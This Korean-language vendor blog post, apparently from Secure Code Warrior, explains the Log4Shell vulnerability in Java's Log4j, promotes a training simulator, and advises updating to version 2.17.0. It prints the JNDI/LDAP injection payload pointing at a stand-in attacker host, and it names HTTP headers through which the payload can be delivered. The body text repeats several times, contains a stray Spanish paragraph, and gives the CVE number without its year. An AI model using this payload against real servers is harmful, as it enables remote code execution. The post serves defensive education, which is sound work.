Log4j 취약점 설명: 공격 경로 및 예방 방법
12월 9일, Java Log4j 라이브러리에서 제로데이 취약점이 발견되었습니다. CVE-44228로 명명된 이 취약점은 'Log4Shell'이라는 별칭을 가지며, 원격 코드 실행(RCE)을 유발할 수 있어 '고위험' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 Java 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션이 위험에 노출되었습니다.
Log4Shell 대응 능력을 빠르게 향상시키고 싶으신가요?
Log4Shell의 기본 개념부터 Mission이라는 시뮬레이터에서 이 취약점이 어떻게 악용되는지 체험할 수 있는 데모를 제작했습니다. 이 미션을 통해 Log4j 취약점이 귀사의 인프라와 애플리케이션에 어떤 영향을 미칠 수 있는지 보여드리겠습니다. 데모에 바로 접속하려면 여기를 클릭하거나, 취약점에 대한 자세한 내용을 계속 읽어보시기 바랍니다.
옛날 뉴스?
이 익스플로잇은 새로운 것이 아닙니다. 이미 2016년 BlackHat 발표에서 보안 연구원 알바로 무뇨즈(Álvaro Muñoz)와 올렉산드르 미로시(Oleksandr Mirosh)는"애플리케이션은 신뢰할 수 없는 데이터로 JNDI 검색을 수행해서는 안 된다"고강조하며, 특정 JNDI/LDAP 주입이 원격 코드 실행을 유발할 수 있음을 시연했습니다. 그리고 이것이 바로 Log4Shell의 핵심입니다.
공격 벡터
Log4Shell의 주입 페이로드 구조는 다음과 같습니다:
$ {jndi:ldap: //attacker.host/xyz}
Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.
다음으로 JNDI( Java 이름 및 디렉터리 인터페이스) 가 있습니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 통해 서비스에 연결하여 데이터나 리소스를 검색할 수 있게 해주는 API입니다. 간단히 말해, 앞서 언급한 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 검색합니다. 예를 들어, 그 응답은 악성 코드를 포함하는 Java 클래스 파일을 가리킬 수 있으며, 이는 취약한 서버에서 실행될 것입니다.
이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 항목을 평가하며, EL 구문으로 작성된 등록된 사용자 항목 중 접두사 'jndi'로 시작하는 항목을 모두 검색하기 때문입니다. 페이로드는 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 삽입될 수 있습니다. 또한 사용자 에이전트(User-Agent) 및 X-Forwarded-For와 같은 HTTP 헤더 및 기타 헤더를 페이로드 전달을 위해 조작할 수 있습니다.
이 익스플로잇을 직접 체험해 보려면, 저희 프레젠테이션으로 이동하여 2단계인 「체험의 영향」으로 넘어가세요.
예방: 인식 제고
모든 애플리케이션에 대해 업데이트를 권장합니다. Log4j는 취약한 코드를 수정해 왔기 때문입니다. 그러나 버전 2.15.0과 2.16.0에는 DDoS 공격 및 기타 취약점이 포함되어 있어, 12월 말 기준으로 2.17.0으로 업데이트하는 것이 권장됩니다.
코드를 작성하는 개발자로서 우리는 항상 보안을 염두에 두어야 합니다. Log4Shell은 타사 프레임워크나 라이브러리의 사용이 위험을 수반한다는 점을 우리에게 가르쳐 주었습니다. 우리는 외부 소스를 사용할 경우, 순진하게도 안전하다고 가정했던 그 소스들로 인해 우리 애플리케이션의 보안이 위협받을 수 있다는 사실을 인지해야 합니다.
이 취약점을 피할 수 있었을까? 그렇기도 하고 아니기도 하다. 한편으로는 취약한 구성 요소가 제3자 소프트웨어를 통해 도입된 경우 개발자가 할 수 있는 일은 제한적이다. 다른 한편으로는 여기서 얻은 교훈은 반복해서 강조되어 온 교훈, 즉 사용자의 의견을 절대 신뢰해서는 안 된다는 것이다.
Secure Code Warrior 보안에 민감한 개발자가 코드 취약점을 방지하는 최선의 방법이라고 Secure Code Warrior . SCW가 확장 가능하고 프로그래밍 프레임워크에 특화된 교육을 제공하기 때문에 기업 고객들은 보고서 데이터를 활용해 영향을 받는 자바 개발자를 신속하게 파악할 수 있었습니다. 또한 SCW에서 훈련받은 보안 전문가들을 신뢰하여 Log4j 업데이트를 가속화했습니다.
특히 Java 개발자를 위해 Secure Code Warrior 무료 IntelliJ 플러그인인 Sensei Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 지침을 준수하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사가 미리 준비한 레시피를 활용할 수 있습니다. 다양한 레시피를 살펴보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피도 꼭 다운로드하세요.
Log4Shell로부터 방어하며 기술을 향상시키세요
이 블로그 게시물에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움이 될 수 있습니다. 프레젠테이션 시작 부분에서 해당 취약점에 대한 간략한 복습을 진행한 후, 안내에 따라 익스플로잇을 테스트해볼 수 있는 시뮬레이션 환경에 접속하게 됩니다.
2021년 12월, 자바 라이브러리 Log4j에서 Log4Shell이라는 중대한 보안 취약점이 발견되었습니다. 본 글에서는 Log4Shell 취약점을 가장 쉽게 설명하여 기본 개념을 이해하도록 돕고, 여러분에게 한 가지 미션을 제시합니다: 이 취약점에 대한 지식을 활용하여 시뮬레이션된 웹사이트를 공격해 볼 수 있는 실습 환경입니다.
Secure Code Warrior 귀사의 조직이 소프트웨어 개발 라이프사이클 전반에 걸쳐 코드를 보호하고 사이버보안을 최우선으로 하는 문화를 조성하도록 Secure Code Warrior . AppSec 관리자, 개발자, CISO 또는 보안 관련 담당자라면 누구든, 저희는 귀사의 조직이 안전하지 않은 코드와 관련된 위험을 줄일 수 있도록 돕습니다.
데모 예약하기
Laura Verheyde는 Secure Code Warrior 의 소프트웨어 개발자로서 취약점을 연구하고 Missions 및 코딩 연구소의 콘텐츠를 제작하는 데 주력하고 있습니다.
12월 9일, Java Log4j 라이브러리에서 제로데이 취약점이 발견되었습니다. CVE-44228로 명명된 이 취약점은 'Log4Shell'이라는 별칭을 가지며, 원격 코드 실행(RCE)을 유발할 수 있어 '고위험' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 Java 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션이 위험에 노출되었습니다.
Log4Shell 대응 능력을 빠르게 향상시키고 싶으신가요?
Log4Shell의 기본 개념부터 Mission이라는 시뮬레이터에서 이 취약점이 어떻게 악용되는지 체험할 수 있는 데모를 제작했습니다. 이 미션을 통해 Log4j 취약점이 귀사의 인프라와 애플리케이션에 어떤 영향을 미칠 수 있는지 보여드리겠습니다. 데모에 바로 접속하려면 여기를 클릭하거나, 취약점에 대한 자세한 내용을 계속 읽어보시기 바랍니다.
옛날 뉴스?
이 익스플로잇은 새로운 것이 아닙니다. 이미 2016년 BlackHat 발표에서 보안 연구원 알바로 무뇨즈(Álvaro Muñoz)와 올렉산드르 미로시(Oleksandr Mirosh)는"애플리케이션은 신뢰할 수 없는 데이터로 JNDI 검색을 수행해서는 안 된다"고강조하며, 특정 JNDI/LDAP 주입이 원격 코드 실행을 유발할 수 있음을 시연했습니다. 그리고 이것이 바로 Log4Shell의 핵심입니다.
공격 벡터
Log4Shell의 주입 페이로드 구조는 다음과 같습니다:
$ {jndi:ldap: //attacker.host/xyz}
Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.
다음으로 JNDI( Java 이름 및 디렉터리 인터페이스) 가 있습니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 통해 서비스에 연결하여 데이터나 리소스를 검색할 수 있게 해주는 API입니다. 간단히 말해, 앞서 언급한 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 검색합니다. 예를 들어, 그 응답은 악성 코드를 포함하는 Java 클래스 파일을 가리킬 수 있으며, 이는 취약한 서버에서 실행될 것입니다.
이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 항목을 평가하며, EL 구문으로 작성된 등록된 사용자 항목 중 접두사 'jndi'로 시작하는 항목을 모두 검색하기 때문입니다. 페이로드는 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 삽입될 수 있습니다. 또한 사용자 에이전트(User-Agent) 및 X-Forwarded-For와 같은 HTTP 헤더 및 기타 헤더를 페이로드 전달을 위해 조작할 수 있습니다.
이 익스플로잇을 직접 체험해 보려면, 저희 프레젠테이션으로 이동하여 2단계인 「체험의 영향」으로 넘어가세요.
예방: 인식 제고
모든 애플리케이션에 대해 업데이트를 권장합니다. Log4j는 취약한 코드를 수정해 왔기 때문입니다. 그러나 버전 2.15.0과 2.16.0에는 DDoS 공격 및 기타 취약점이 포함되어 있어, 12월 말 기준으로 2.17.0으로 업데이트하는 것이 권장됩니다.
코드를 작성하는 개발자로서 우리는 항상 보안을 염두에 두어야 합니다. Log4Shell은 타사 프레임워크나 라이브러리의 사용이 위험을 수반한다는 점을 우리에게 가르쳐 주었습니다. 우리는 외부 소스를 사용할 경우, 순진하게도 안전하다고 가정했던 그 소스들로 인해 우리 애플리케이션의 보안이 위협받을 수 있다는 사실을 인지해야 합니다.
이 취약점을 피할 수 있었을까? 그렇기도 하고 아니기도 하다. 한편으로는 취약한 구성 요소가 제3자 소프트웨어를 통해 도입된 경우 개발자가 할 수 있는 일은 제한적이다. 다른 한편으로는 여기서 얻은 교훈은 반복해서 강조되어 온 교훈, 즉 사용자의 의견을 절대 신뢰해서는 안 된다는 것이다.
Secure Code Warrior 보안에 민감한 개발자가 코드 취약점을 방지하는 최선의 방법이라고 Secure Code Warrior . SCW가 확장 가능하고 프로그래밍 프레임워크에 특화된 교육을 제공하기 때문에 기업 고객들은 보고서 데이터를 활용해 영향을 받는 자바 개발자를 신속하게 파악할 수 있었습니다. 또한 SCW에서 훈련받은 보안 전문가들을 신뢰하여 Log4j 업데이트를 가속화했습니다.
특히 Java 개발자를 위해 Secure Code Warrior 무료 IntelliJ 플러그인인 Sensei Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 지침을 준수하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사가 미리 준비한 레시피를 활용할 수 있습니다. 다양한 레시피를 살펴보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피도 꼭 다운로드하세요.
Log4Shell로부터 방어하며 기술을 향상시키세요
이 블로그 게시물에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움이 될 수 있습니다. 프레젠테이션 시작 부분에서 해당 취약점에 대한 간략한 복습을 진행한 후, 안내에 따라 익스플로잇을 테스트해볼 수 있는 시뮬레이션 환경에 접속하게 됩니다.
12월 9일, Java Log4j 라이브러리에서 제로데이 취약점이 발견되었습니다. CVE-44228로 명명된 이 취약점은 'Log4Shell'이라는 별칭을 가지며, 원격 코드 실행(RCE)을 유발할 수 있어 '고위험' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 Java 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션이 위험에 노출되었습니다.
Log4Shell 대응 능력을 빠르게 향상시키고 싶으신가요?
Log4Shell의 기본 개념부터 Mission이라는 시뮬레이터에서 이 취약점이 어떻게 악용되는지 체험할 수 있는 데모를 제작했습니다. 이 미션을 통해 Log4j 취약점이 귀사의 인프라와 애플리케이션에 어떤 영향을 미칠 수 있는지 보여드리겠습니다. 데모에 바로 접속하려면 여기를 클릭하거나, 취약점에 대한 자세한 내용을 계속 읽어보시기 바랍니다.
옛날 뉴스?
이 익스플로잇은 새로운 것이 아닙니다. 이미 2016년 BlackHat 발표에서 보안 연구원 알바로 무뇨즈(Álvaro Muñoz)와 올렉산드르 미로시(Oleksandr Mirosh)는"애플리케이션은 신뢰할 수 없는 데이터로 JNDI 검색을 수행해서는 안 된다"고강조하며, 특정 JNDI/LDAP 주입이 원격 코드 실행을 유발할 수 있음을 시연했습니다. 그리고 이것이 바로 Log4Shell의 핵심입니다.
공격 벡터
Log4Shell의 주입 페이로드 구조는 다음과 같습니다:
$ {jndi:ldap: //attacker.host/xyz}
Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.
다음으로 JNDI( Java 이름 및 디렉터리 인터페이스) 가 있습니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 통해 서비스에 연결하여 데이터나 리소스를 검색할 수 있게 해주는 API입니다. 간단히 말해, 앞서 언급한 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 검색합니다. 예를 들어, 그 응답은 악성 코드를 포함하는 Java 클래스 파일을 가리킬 수 있으며, 이는 취약한 서버에서 실행될 것입니다.
이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 항목을 평가하며, EL 구문으로 작성된 등록된 사용자 항목 중 접두사 'jndi'로 시작하는 항목을 모두 검색하기 때문입니다. 페이로드는 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 삽입될 수 있습니다. 또한 사용자 에이전트(User-Agent) 및 X-Forwarded-For와 같은 HTTP 헤더 및 기타 헤더를 페이로드 전달을 위해 조작할 수 있습니다.
이 익스플로잇을 직접 체험해 보려면, 저희 프레젠테이션으로 이동하여 2단계인 「체험의 영향」으로 넘어가세요.
예방: 인식 제고
모든 애플리케이션에 대해 업데이트를 권장합니다. Log4j는 취약한 코드를 수정해 왔기 때문입니다. 그러나 버전 2.15.0과 2.16.0에는 DDoS 공격 및 기타 취약점이 포함되어 있어, 12월 말 기준으로 2.17.0으로 업데이트하는 것이 권장됩니다.
코드를 작성하는 개발자로서 우리는 항상 보안을 염두에 두어야 합니다. Log4Shell은 타사 프레임워크나 라이브러리의 사용이 위험을 수반한다는 점을 우리에게 가르쳐 주었습니다. 우리는 외부 소스를 사용할 경우, 순진하게도 안전하다고 가정했던 그 소스들로 인해 우리 애플리케이션의 보안이 위협받을 수 있다는 사실을 인지해야 합니다.
이 취약점을 피할 수 있었을까? 그렇기도 하고 아니기도 하다. 한편으로는 취약한 구성 요소가 제3자 소프트웨어를 통해 도입된 경우 개발자가 할 수 있는 일은 제한적이다. 다른 한편으로는 여기서 얻은 교훈은 반복해서 강조되어 온 교훈, 즉 사용자의 의견을 절대 신뢰해서는 안 된다는 것이다.
Secure Code Warrior 보안에 민감한 개발자가 코드 취약점을 방지하는 최선의 방법이라고 Secure Code Warrior . SCW가 확장 가능하고 프로그래밍 프레임워크에 특화된 교육을 제공하기 때문에 기업 고객들은 보고서 데이터를 활용해 영향을 받는 자바 개발자를 신속하게 파악할 수 있었습니다. 또한 SCW에서 훈련받은 보안 전문가들을 신뢰하여 Log4j 업데이트를 가속화했습니다.
특히 Java 개발자를 위해 Secure Code Warrior 무료 IntelliJ 플러그인인 Sensei Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 지침을 준수하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사가 미리 준비한 레시피를 활용할 수 있습니다. 다양한 레시피를 살펴보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피도 꼭 다운로드하세요.
Log4Shell로부터 방어하며 기술을 향상시키세요
이 블로그 게시물에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움이 될 수 있습니다. 프레젠테이션 시작 부분에서 해당 취약점에 대한 간략한 복습을 진행한 후, 안내에 따라 익스플로잇을 테스트해볼 수 있는 시뮬레이션 환경에 접속하게 됩니다.
아래 링크를 클릭하고 이 자료의 PDF를 다운로드하세요.
Secure Code Warrior 귀사의 조직이 소프트웨어 개발 라이프사이클 전반에 걸쳐 코드를 보호하고 사이버보안을 최우선으로 하는 문화를 조성하도록 Secure Code Warrior . AppSec 관리자, 개발자, CISO 또는 보안 관련 담당자라면 누구든, 저희는 귀사의 조직이 안전하지 않은 코드와 관련된 위험을 줄일 수 있도록 돕습니다.
보고서 보기데모 예약하기
Laura Verheyde는 Secure Code Warrior 의 소프트웨어 개발자로서 취약점을 연구하고 Missions 및 코딩 연구소의 콘텐츠를 제작하는 데 주력하고 있습니다.
12월 9일, Java Log4j 라이브러리에서 제로데이 취약점이 발견되었습니다. CVE-44228로 명명된 이 취약점은 'Log4Shell'이라는 별칭을 가지며, 원격 코드 실행(RCE)을 유발할 수 있어 '고위험' 등급을 받았습니다. 또한 log4j-core는 가장 널리 사용되는 Java 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션이 위험에 노출되었습니다.
Log4Shell 대응 능력을 빠르게 향상시키고 싶으신가요?
Log4Shell의 기본 개념부터 Mission이라는 시뮬레이터에서 이 취약점이 어떻게 악용되는지 체험할 수 있는 데모를 제작했습니다. 이 미션을 통해 Log4j 취약점이 귀사의 인프라와 애플리케이션에 어떤 영향을 미칠 수 있는지 보여드리겠습니다. 데모에 바로 접속하려면 여기를 클릭하거나, 취약점에 대한 자세한 내용을 계속 읽어보시기 바랍니다.
옛날 뉴스?
이 익스플로잇은 새로운 것이 아닙니다. 이미 2016년 BlackHat 발표에서 보안 연구원 알바로 무뇨즈(Álvaro Muñoz)와 올렉산드르 미로시(Oleksandr Mirosh)는"애플리케이션은 신뢰할 수 없는 데이터로 JNDI 검색을 수행해서는 안 된다"고강조하며, 특정 JNDI/LDAP 주입이 원격 코드 실행을 유발할 수 있음을 시연했습니다. 그리고 이것이 바로 Log4Shell의 핵심입니다.
공격 벡터
Log4Shell의 주입 페이로드 구조는 다음과 같습니다:
$ {jndi:ldap: //attacker.host/xyz}
Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.
다음으로 JNDI( Java 이름 및 디렉터리 인터페이스) 가 있습니다. 이는 LDAP, DNS, RMI 등의 프로토콜을 통해 서비스에 연결하여 데이터나 리소스를 검색할 수 있게 해주는 API입니다. 간단히 말해, 앞서 언급한 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 검색합니다. 예를 들어, 그 응답은 악성 코드를 포함하는 Java 클래스 파일을 가리킬 수 있으며, 이는 취약한 서버에서 실행될 것입니다.
이 취약점이 특히 문제가 되는 이유는 Log4j가 모든 로그 항목을 평가하며, EL 구문으로 작성된 등록된 사용자 항목 중 접두사 'jndi'로 시작하는 항목을 모두 검색하기 때문입니다. 페이로드는 사용자가 데이터를 입력할 수 있는 모든 위치(예: 양식 필드)에 삽입될 수 있습니다. 또한 사용자 에이전트(User-Agent) 및 X-Forwarded-For와 같은 HTTP 헤더 및 기타 헤더를 페이로드 전달을 위해 조작할 수 있습니다.
이 익스플로잇을 직접 체험해 보려면, 저희 프레젠테이션으로 이동하여 2단계인 「체험의 영향」으로 넘어가세요.
예방: 인식 제고
모든 애플리케이션에 대해 업데이트를 권장합니다. Log4j는 취약한 코드를 수정해 왔기 때문입니다. 그러나 버전 2.15.0과 2.16.0에는 DDoS 공격 및 기타 취약점이 포함되어 있어, 12월 말 기준으로 2.17.0으로 업데이트하는 것이 권장됩니다.
코드를 작성하는 개발자로서 우리는 항상 보안을 염두에 두어야 합니다. Log4Shell은 타사 프레임워크나 라이브러리의 사용이 위험을 수반한다는 점을 우리에게 가르쳐 주었습니다. 우리는 외부 소스를 사용할 경우, 순진하게도 안전하다고 가정했던 그 소스들로 인해 우리 애플리케이션의 보안이 위협받을 수 있다는 사실을 인지해야 합니다.
이 취약점을 피할 수 있었을까? 그렇기도 하고 아니기도 하다. 한편으로는 취약한 구성 요소가 제3자 소프트웨어를 통해 도입된 경우 개발자가 할 수 있는 일은 제한적이다. 다른 한편으로는 여기서 얻은 교훈은 반복해서 강조되어 온 교훈, 즉 사용자의 의견을 절대 신뢰해서는 안 된다는 것이다.
Secure Code Warrior 보안에 민감한 개발자가 코드 취약점을 방지하는 최선의 방법이라고 Secure Code Warrior . SCW가 확장 가능하고 프로그래밍 프레임워크에 특화된 교육을 제공하기 때문에 기업 고객들은 보고서 데이터를 활용해 영향을 받는 자바 개발자를 신속하게 파악할 수 있었습니다. 또한 SCW에서 훈련받은 보안 전문가들을 신뢰하여 Log4j 업데이트를 가속화했습니다.
특히 Java 개발자를 위해 Secure Code Warrior 무료 IntelliJ 플러그인인 Sensei Secure Code Warrior . 이 규칙 기반 코드 분석 도구는 코딩 지침을 준수하고 취약점을 예방 및 수정하는 데 사용할 수 있습니다. 사용자 정의 규칙을 생성하거나 당사가 미리 준비한 레시피를 활용할 수 있습니다. 다양한 레시피를 살펴보시고, Log4Shell 취약점을 순식간에 찾아 수정하는 데 도움이 되는 Log4j 레시피도 꼭 다운로드하세요.
Log4Shell로부터 방어하며 기술을 향상시키세요
이 블로그 게시물에서 배운 내용을 직접 적용해보고 싶으신가요? 저희 데모 환경이 도움이 될 수 있습니다. 프레젠테이션 시작 부분에서 해당 취약점에 대한 간략한 복습을 진행한 후, 안내에 따라 익스플로잇을 테스트해볼 수 있는 시뮬레이션 환경에 접속하게 됩니다.
%20(1).avif)
.avif)
